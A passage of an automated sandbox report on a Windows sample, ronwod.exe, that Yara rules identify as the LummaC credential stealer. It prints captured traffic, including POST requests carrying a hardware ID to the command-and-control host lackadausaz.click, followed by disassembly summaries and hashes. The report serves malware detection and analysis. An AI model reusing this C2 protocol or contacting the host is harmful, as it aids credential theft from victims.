2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: f2 91 4b e0 7d f3 05 61 22 66 ad c9 f3 b7 61 91 48 d2 7c 3e e6 d0 38 10 45 2a f1 ad b1 2d 69 95 ef c7 7f 2c 44 fa 38 8b 3d ff 8b 6f 3a e5 49 7d 6e 63 56 61 aa 86 e0 fb f7 ce 51 e1 45 8e 7a de 9b d0 41 13 d6 68 85 e0 23 45 d9 50 91 59 e3 b0 f2 60 45 74 43 44 a9 f0 3d 47 bd d5 61 63 40 21 80 c4 3c a4 c8 0c b8 a4 5d a7 48 46 b1 d4 07 18 80 5f 46 e6 72 ac 56 2f 03 22 fe d8 9d f5 4b f9 f1 43 e7 f6 f5 b7 97 54 0e ae bc cd a1 a6 66 3c 27 75 19 50 bb b4 af 25 03 95 fe a5 b6 d5 d2 ac eb 9b 2d 73 42 07 39 dc 31 3e b9 0b f0 2a 8c a6 cf 62 95 f8 04 b2 cb c7 f7 2a 41 97 2f 16 ff 90 ef bb aa b4 63 a6 9d a0 d5 1f 13 a7 82 e6 ff ae 41 60 ea 2a ef a5 5a d0 21 5e 41 b7 b9 23 23 12 06 61 95 b7 2b 2b 4f 28 56 0f 0b f7 ca 22 8e f0 7b b6 20 d7 68 b5 9f 79 8e 52 b2 28 2e 3b 26 Data Ascii: K}a"faH\|>8E-i,D8=o:I}ncVaQEzAh#EPY`EtCD=Gac@!<]HF_FrV/"KCTf<'uP%-sB91>bA/cA`Z!^A##a++O(V"{ hyR(.;&
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: c3 96 58 1e 3f 7e 0d f2 b1 5e 02 92 50 8b e9 77 ec 40 44 62 6d d1 d8 cc 09 88 7a be 1e 57 b5 7f 63 ca 9b 5b 4e 04 67 dc fc 26 b3 f5 78 79 5f 6e c8 b5 3b 3d 3b 72 a8 e9 48 ac 0a fd 61 28 a7 6d 52 0a 86 83 c9 2b 10 a8 2b 64 ea 36 88 dd 6c 4b 7c 3f ba 8b 52 0e 78 ea 1f 19 22 b1 fd d9 fc 1a 4f 22 a8 67 54 32 77 28 4e 65 b6 76 20 2d 08 43 81 ee eb 86 33 d5 05 87 66 25 b2 bf 6b 6f af 4c 50 26 35 af 8c 28 65 c4 7a d0 1d 63 b5 b3 54 ea b6 5e 6b bb b5 9b 55 60 8c 43 6f 9d 17 5a 7e cc bd a0 fb 52 dd c0 6e 88 c0 71 1a ab 96 4d e1 38 ea ad 9c 08 3e 13 67 5c 4f 32 e1 41 40 50 75 00 82 8b 08 42 ce 2d 66 d6 57 e6 79 43 13 de 42 60 b0 0a 7a 97 c3 6d e7 77 08 8f 3d 29 a0 c6 d8 df 23 5a 0d 45 1c c1 6d cf c0 14 27 18 56 3c 74 bf 82 fe 3e 1d e2 39 b4 cf 21 9d 73 4b 4b 5f c3 Data Ascii: X?~^Pw@DbmzWc[Ng&xy_n;=;rHa(mR++d6lK\|?Rx"O"gT2w(Nev -C3f%koLP&5(ezcT^kU`CoZ~RnqM8>g\O2A@PuB-fWyCB`zmw=)#ZEm'V<t>9!sKK_
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: 97 22 a7 7c 1d ab c0 7c 99 d7 7c 4f b9 b3 8c 70 f9 15 c5 72 13 3b c7 db 7c 52 d6 82 0d 43 83 ff ef 85 ce 7d 08 f1 e4 3d ce b3 6c 8e e1 a6 6f 72 32 06 f6 d3 96 a9 15 ee e6 43 f5 4e 7a c5 bf 69 5f e3 48 a5 7d 50 93 7f 3d 23 36 98 d3 38 30 f4 ee e9 72 c8 1a 5a 3f 4a 9f 4c fb 92 ae 28 6e 50 3a 37 af e2 90 af a9 41 a5 7e d5 d6 be 8a 6e bf 0e 1a 06 76 c9 84 9c 55 00 96 81 bc c7 ff e7 4b 33 1f c3 27 03 40 eb 4f ca 95 5d 04 34 33 f6 27 ec 76 55 69 c2 ba cf 39 e5 cf 1e 6f a2 17 9f a5 2e c0 dc 68 e1 56 3e 71 f0 03 b2 3b 8f 68 d4 a5 0c 1f 85 e7 65 a9 e4 c4 33 ce 7b d9 44 ae ec f2 6b 67 e5 ac 9c ee d0 c4 f7 83 f0 2b 7c 0c e3 25 72 ca 76 cb 06 25 0d ed 3e 18 e5 3b e1 76 bd 21 0e 0d 0b 0b f1 31 4f 98 18 eb b1 45 c1 8c 34 20 0c 71 ed d9 ee f9 dc f9 fa 40 2d c2 af a6 e8 Data Ascii: "\|\|\|Opr;\|RC}=lor2CNzi_H}P=#680rZ?JL(nP:7A~nvUK3'@O]43'vUi9o.hV>q;he3{Dkg+\|%rv%>;v!1OE4 q@-
2024-12-28 07:17:50 UTC	15331	OUT	Data Raw: 7e 3e c8 81 2e ee 97 df b1 50 ca 42 1d 19 61 aa 83 fe 37 fc ff 30 27 a4 3f a8 50 40 c7 d2 52 4e 92 cc 43 35 49 fb 0a 1b 5c 62 a3 7e fa 50 b9 e6 73 e7 6c ef 10 45 c0 0d 5b 79 21 95 3d 1c 4b 98 b4 73 95 2f 7d d1 38 53 52 a2 ef 02 cb 5d 72 5a f9 0e 30 43 de 9c dd 2a 39 8f d4 31 d5 37 cf 16 5e 61 61 84 b9 e1 4e 62 2f 4a 80 28 4f fc 93 18 38 8b fc 12 30 00 e0 de fa 58 b9 64 c8 5d 41 d2 58 ce b7 31 6e 22 2a df e5 c9 af e9 3e 1a 35 03 6f 11 bc 6e 6c 6a 92 85 ed c9 dc d7 49 95 fa b3 a7 e5 7b 39 c9 2d 5f d3 6e fc f9 35 f9 d7 98 8d 43 df da 31 c5 75 5e ae d1 17 35 3c 88 44 14 e5 b0 40 c7 32 f6 1a 28 4f e6 94 33 b4 4f 65 9d 36 fb 8c 5d e2 2f be f3 d8 3f 2d 04 54 d2 8d 2b 9d 8b 7e aa c7 84 a6 45 fc 28 62 c7 f9 3b 30 8f 40 90 5c 25 ab f0 14 29 68 ee 7d 9b 7e 70 7f 58 Data Ascii: ~>.PBa70'?P@RNC5I\b~PslE[y!=Ks/}8SR]rZ0C917^aaNb/J(O80Xd]AX1n">5onljI{9-_n5C1u^5<D@2(O3Oe6]/?-T+~E(b;0@\%)h}~pX
2024-12-28 07:17:56 UTC	1139	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cr0m4tml6kocil8ni9ihe252dv; expires=Wed, 23 Apr 2025 01:04:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YobLgDupBWsA7o2dV9kYjh1Wlpj44bqcJi9HiQSdq2v4xIa%2BQjwknvhnZ17%2B8iYzju4zaGHi1mCfPwg81kX1fi9%2FYtlBLImVSCvQtTHGIVcBBRRBUqgYEtKc%2BT8CgLe51IEIVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc5e25e5742a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2426&min_rtt=2425&rtt_var=910&sent=347&recv=594&lost=0&retrans=0&sent_bytes=2845&recv_bytes=575059&delivery_rate=1204123&cwnd=229&unsent_bytes=0&cid=6bd1508c78cd5c11&ts=5897&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49741	104.21.92.219	443	7544	C:\Users\user\Desktop\ronwod.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 07:17:58 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 83 Host: lackadausaz.click
2024-12-28 07:17:58 UTC	83	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 49 52 69 61 46 69 2d 2d 32 36 64 65 6b 31 26 6a 3d 26 68 77 69 64 3d 44 30 33 34 30 37 44 43 33 38 35 38 31 32 35 43 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 Data Ascii: act=get_message&ver=4.0&lid=IRiaFi--26dek1&j=&hwid=D03407DC3858125CBCFD68B774EF9B7A
2024-12-28 07:17:58 UTC	1127	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 07:17:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9it54tue5pd295cjf23t7dupq0; expires=Wed, 23 Apr 2025 01:04:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xxLBnKXcyz%2FELUrmvNPPLuLjA5FZNaUkscJA7MWULmC18lG5iK7IF4WlNkhimRPJo%2FHMt29hc9Jz3LbxhMhHRqBzbyqoUH8Cyz6WjeUPrKtEzRbUXvLvaPEqn4RfjMWmcj7IUQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8fc6100e664376-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1641&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=984&delivery_rate=1729857&cwnd=248&unsent_bytes=0&cid=3b7f6ec2d1ab6876&ts=861&x=0"
2024-12-28 07:17:58 UTC	54	IN	Data Raw: 33 30 0d 0a 70 78 51 4f 2b 32 63 73 73 56 4e 70 78 43 64 4f 47 38 66 67 69 53 45 39 41 75 4c 45 50 79 46 4f 30 5a 4e 43 34 50 30 51 7a 67 44 38 53 51 3d 3d 0d 0a Data Ascii: 30pxQO+2cssVNpxCdOG8fgiSE9AuLEPyFO0ZNC4P0QzgD8SQ==
2024-12-28 07:17:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:17:33
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\ronwod.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ronwod.exe"
Imagebase:	0x230000
File size:	28'672 bytes
MD5 hash:	63FF0C8E75AA669F22E79EBF017C0AA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1778237713.0000000001046000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1777955203.000000000103E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1750181906.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1724682742.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1750093043.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1750624772.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1701708029.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1974188123.000000006CD4A000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1775565703.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1728584108.0000000001024000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	96.6%
Signature Coverage:	62.6%
Total number of Nodes:	262
Total number of Limit Nodes:	20

Executed Functions

Function 00EB3675 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1032
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 00EB36A9
GetLogicalDrives.KERNEL32 ref: 00EB3996

Strings

Vq, xrefs: 00EB4B78, 00EB42C2, 00EB4971, 00EB4774, 00EB474F, 00EB4579
ef, xrefs: 00EB4AA2
9, xrefs: 00EB46D4
XH, xrefs: 00EB4A2A
_p, xrefs: 00EB4A02
rl, xrefs: 00EB49D0
45, xrefs: 00EB46DE
AQ, xrefs: 00EB4A5C
Ys, xrefs: 00EB4A84
\a, xrefs: 00EB3725
wY, xrefs: 00EB49EE
&Kt0, xrefs: 00EB42B5
bo, xrefs: 00EB49E4
Vq, xrefs: 00EB499E
\\, xrefs: 00EB49F8
>>, xrefs: 00EB471A
|i, xrefs: 00EB4A98
fmkm, xrefs: 00EB3B4D
|s, xrefs: 00EB4A8E
PR, xrefs: 00EB4A48
bmdm, xrefs: 00EB3B70
Hmkm, xrefs: 00EB3B69
<, xrefs: 00EB4724
mm, xrefs: 00EB49DA
)mOm, xrefs: 00EB3B77
pmrm, xrefs: 00EB3B3F

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: DrivesEnvironmentExpandLogicalStrings
String ID: 9$&Kt0$)mOm$45$<$>>$AQ$Hmkm$PR$Vq$Vq$XH$Ys$\\$_p$bmdm$bo$ef$fmkm$mm$pmrm$rl$wY$|i$|s$\a
API String ID: 1595903574-2236109924
Opcode ID: bbd5da77d55e4ff1078f61c88f6e0d0c1d2144495aa4e2d10650115b2a6026b6
Instruction ID: 1826b4e76585fef61968dfe37f9852ac64fdae87a3ba428ebe597cef04a60756
Opcode Fuzzy Hash: bbd5da77d55e4ff1078f61c88f6e0d0c1d2144495aa4e2d10650115b2a6026b6
Instruction Fuzzy Hash: A7A2A5B99112299FDB20DF29DC8529EBB71FF95304F1086E9C8597B350E7349A81CF81

Function 0023346D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EMuqdKRvBcgQuKOr.CR ref: 00233AF6

Strings

xvSnPeDynuj, xrefs: 00233698
rbxMMVTPRX, xrefs: 00233A13
XSKIHuymetD, xrefs: 002337CB
Office should Congress most rich likely large. Church ev, xrefs: 002335EB
XJSRBDxKyaSs, xrefs: 0023361D
ANHeIue, xrefs: 002337C3
rwsGuyqwzAP, xrefs: 0023373F
yZasTv, xrefs: 00233603
Area possible always matter his vote, xrefs: 00233613
Everything style, xrefs: 0023366F
e o, xrefs: 002334EA
"s, xrefs: 0023391B
hvaeczrruYw, xrefs: 00233953
kiwvMKnkoz, xrefs: 00233933
XkzrMvTaZ, xrefs: 002336DD
ISAwZDVYrka, xrefs: 0023394B
7, xrefs: 00233840
cJEqBOnCxLkR, xrefs: 0023360B
e f, xrefs: 002335E1
==, xrefs: 002334B9
WlLIBtD, xrefs: 002336D5
FIXGDzM, xrefs: 002336F5
ver, xrefs: 0023357D

Memory Dump Source

Source File: 00000000.00000002.1973185118.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true

Associated: 00000000.00000002.1973167124.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973202167.0000000000236000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973217270.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973231998.000000000023C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1973245888.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_230000_ronwod.jbxd

Similarity

API ID: Muqd
String ID: "s$7$==$ANHeIue$Area possible always matter his vote$Everything style$FIXGDzM$ISAwZDVYrka$Office should Congress most rich likely large. Church ev$WlLIBtD$XJSRBDxKyaSs$XSKIHuymetD$XkzrMvTaZ$cJEqBOnCxLkR$e f$e o$hvaeczrruYw$kiwvMKnkoz$rbxMMVTPRX$rwsGuyqwzAP$ver$xvSnPeDynuj$yZasTv
API String ID: 1727731889-288809459
Opcode ID: 0ea683756006088e332f72faf13629d0cbdce78c9c4e5ef47e5f01173cb5fc72
Instruction ID: b9b336182c94d5842de16986aa3aa576666c3f1efc6d055e70c6cd112ae42044
Opcode Fuzzy Hash: 0ea683756006088e332f72faf13629d0cbdce78c9c4e5ef47e5f01173cb5fc72
Instruction Fuzzy Hash: 3D22BDB1D146199FCB10CFA8D985A8EFBF0FF48300F10896AE498EB251D778AA45CF55

Function 00E9CC75 Relevance: 30.2, Strings: 24, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ChYh, xrefs: 00E9CF1A
hh(h, xrefs: 00E9CEC2
xhdh, xrefs: 00E9CE75
shoh, xrefs: 00E9CEAC
0h+h, xrefs: 00E9CE80
uheh, xrefs: 00E9CE8B
fhch, xrefs: 00E9CE96
Ehph, xrefs: 00E9CF66
`h,h, xrefs: 00E9CECD
Rhvh, xrefs: 00E9CE6A
ph8h, xrefs: 00E9CE5F
yhrh, xrefs: 00E9CEA1
ohuh, xrefs: 00E9CE54
Kh^h, xrefs: 00E9CF25
^hYh, xrefs: 00E9CF0F
ehdh, xrefs: 00E9CED8
<h7h, xrefs: 00E9CF46
Xh h, xrefs: 00E9CF3B
HhPh, xrefs: 00E9CEEE
vh}h, xrefs: 00E9CE49
FhFh, xrefs: 00E9CF30
uhjh, xrefs: 00E9CEB7
lackadausaz.click, xrefs: 00E9D003
RhTh, xrefs: 00E9CEF9

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$lackadausaz.click$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
API String ID: 0-3755386291
Opcode ID: c13c3e3b6785e1c8bebcdf9781c3af0901d813d7246dfbf61eb48d57b3ec2dde
Instruction ID: 6be23ed159fbb0de8f39a84b6c98f57e9bd9c547b5f37294acc5d9961474641a
Opcode Fuzzy Hash: c13c3e3b6785e1c8bebcdf9781c3af0901d813d7246dfbf61eb48d57b3ec2dde
Instruction Fuzzy Hash: E5810FB190D3D08ADB309F29D9893ABBBE1EFC2304F65596DC1C86B251EB350916CB52

Function 00EC7CF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 574
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00ED268C,00000000,00000001,00ED267C,00000000), ref: 00EC7E10
SysAllocString.OLEAUT32([d), ref: 00EC7E93
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00EC7ED1
SysAllocString.OLEAUT32(!,.,), ref: 00EC7F2F
SysAllocString.OLEAUT32(B6ABB756), ref: 00EC7FEF
VariantInit.OLEAUT32(?), ref: 00EC805E
VariantClear.OLEAUT32(?), ref: 00EC81B1
SysFreeString.OLEAUT32 ref: 00EC81D4
SysFreeString.OLEAUT32(?), ref: 00EC81DA
SysFreeString.OLEAUT32(00000000), ref: 00EC81EE

Strings

C, xrefs: 00EC7DBF
\, xrefs: 00EC7DCA
W;, xrefs: 00EC7D37
,,Y,, xrefs: 00EC7EE7
[d, xrefs: 00EC7D7C

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
String ID: ,,Y,$C$W;$[d$\
API String ID: 2485776651-2867424240
Opcode ID: c6416afbc56246d22eb10059de45ac33158a255dde803073c3b97b6d05258fb1
Instruction ID: dbc9481c87bfa00a6a969eca42b67e98ad90fd1c9d00ac997361b7bcd172fe1a
Opcode Fuzzy Hash: c6416afbc56246d22eb10059de45ac33158a255dde803073c3b97b6d05258fb1
Instruction Fuzzy Hash: F002FB726083009FD710DF65CE84B6BBBE5EFC5714F18882DE585AB2A0DB76D806CB42

Function 00EA0247 Relevance: 13.0, APIs: 2, Strings: 5, Instructions: 700
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00EA04C9
RtlExpandEnvironmentStrings.NTDLL ref: 00EA05C0

Strings

X@, xrefs: 00EA0916
<., xrefs: 00EA088E
i, xrefs: 00EA09EE
$, xrefs: 00EA0985
f@, xrefs: 00EA09E4

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: $$<.$X@$f@$i
API String ID: 237503144-92190101
Opcode ID: 87771d2f1ec3843e08ee44e2e780daa8fead2574a84718f482baea90716613b5
Instruction ID: 1773e249cc91cd64542f4ccfac9e14f01384e7e7c73563558964a06290c03856
Opcode Fuzzy Hash: 87771d2f1ec3843e08ee44e2e780daa8fead2574a84718f482baea90716613b5
Instruction Fuzzy Hash: 84529572A187508BC7649F38C4813AEB7E1AFC9320F155A2EE8E9E73D1D73499418B43

Function 00E99C6F Relevance: 6.4, Strings: 5, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)XPX, xrefs: 00E99D92
%X:X, xrefs: 00E99D9C
IX6X, xrefs: 00E99DB0
&XSX, xrefs: 00E99D88
7XvX, xrefs: 00E99DA6

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: %X:X$&XSX$)XPX$7XvX$IX6X
API String ID: 0-642955395
Opcode ID: f6d0c9f99145049e992c2e6c5a2210ad0159b385472073b6ff60adb2a51e180a
Instruction ID: 44b798aac7d7ea24c4e2ed012685841bb20a026edad940ef24f737ec1cb01d5b
Opcode Fuzzy Hash: f6d0c9f99145049e992c2e6c5a2210ad0159b385472073b6ff60adb2a51e180a
Instruction Fuzzy Hash: C0417973E107168FDB54CFA5DC847D9BB76FF92B00F1681AC8518A7680EB749652CB40

Function 00EB1570 Relevance: 5.6, Strings: 4, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00EB1863
,, xrefs: 00EB1B60
H, xrefs: 00EB1859
!@, xrefs: 00EB15A3

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$,$H$H
API String ID: 383220839-4170808191
Opcode ID: eb84617ffe6760c6038dd8746c0c29893b37f3b2a74b7a2ee59b20b59d03ba24
Instruction ID: 07709d2962ec1d5c3914cbe50d7d268dc0f26135f978e723ccae9861d9ac78be
Opcode Fuzzy Hash: eb84617ffe6760c6038dd8746c0c29893b37f3b2a74b7a2ee59b20b59d03ba24
Instruction Fuzzy Hash: B93201316083408FD3289F28C4A13AFFBE2EFC5324F59992DE4D5A7391E77988458B42

Function 00EC328C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00EC32DA
GetSystemMetrics.USER32 ref: 00EC32E9

Strings

, xrefs: 00EC33BD

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 14eda80559548b0c55da4edf969bca039ea0191a05aaee56b189f8d139e3f646
Instruction ID: 25c64853911a416ce52243e4c2339db372fb38829163c0a4831fa98d71721538
Opcode Fuzzy Hash: 14eda80559548b0c55da4edf969bca039ea0191a05aaee56b189f8d139e3f646
Instruction Fuzzy Hash: 6E5172B4D152089FCB40EFADE985A9DBBF0BB48310F11852EE498E7350D734A949CF92

Function 00EB6520 Relevance: 4.1, Strings: 3, Instructions: 380
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l'Y9, xrefs: 00EB6913
X`X*, xrefs: 00EB691B
{$[7, xrefs: 00EB6936

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: X`X*$l'Y9${$[7
API String ID: 2994545307-1509796914
Opcode ID: c426ee40c014ca715f9744e850a10be1557d116148b454dfc10a6cb624c10bf3
Instruction ID: 30f3af5c6004bc40d022f80b5aa1fd25f3505f5bc8cf4738f00393957f8d4303
Opcode Fuzzy Hash: c426ee40c014ca715f9744e850a10be1557d116148b454dfc10a6cb624c10bf3
Instruction Fuzzy Hash: 2DB13B72A043255BEB24CF14C8416EB73A2EFD5308F15A52DE885BB395E739EC09C391

Function 00E9A8B0 Relevance: 4.1, Strings: 3, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ok, xrefs: 00E9AAC3
F>]>, xrefs: 00E9A97F
j>a>, xrefs: 00E9AA0F

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: F>]>$j>a>$ok
API String ID: 0-2883800044
Opcode ID: 9bf313a38d0c0343ec2164e907714c2afa4c7e2d028aa4fb922cbf72c7ab27dc
Instruction ID: ef289a2c28e7cf9dbbf76346418a3d90d3cd4f447f321f29e60740102a3742f1
Opcode Fuzzy Hash: 9bf313a38d0c0343ec2164e907714c2afa4c7e2d028aa4fb922cbf72c7ab27dc
Instruction Fuzzy Hash: BAB1DC72A0C3118BCB28CF14945156FBBF2EFD1308F19582CE9D5AB740E27999098BDA

Function 00EBCE60 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 392COMMON

Download Yara Rule

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00EBCF80

Strings

8a, xrefs: 00EBCE70

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 8a
API String ID: 3960555810-1827930058
Opcode ID: 72253bd826440db138141eea7ae5a755a7b6d02d9b67abc12998e1c0d0af4081
Instruction ID: 859bba5fa9967756561b129e1e24dcd3dc14cf2fde7bea5129f8d5e33ffdbd19
Opcode Fuzzy Hash: 72253bd826440db138141eea7ae5a755a7b6d02d9b67abc12998e1c0d0af4081
Instruction Fuzzy Hash: 4DB1B27160C3818BD729CF2AC8553ABFBE1EF96304F58986EE0D5973A1E7798405CB12

Function 00ECD0D9 Relevance: 2.6, Strings: 2, Instructions: 135COMMON

Download Yara Rule

Strings

9., xrefs: 00ECD150
9., xrefs: 00ECD200

Memory Dump Source

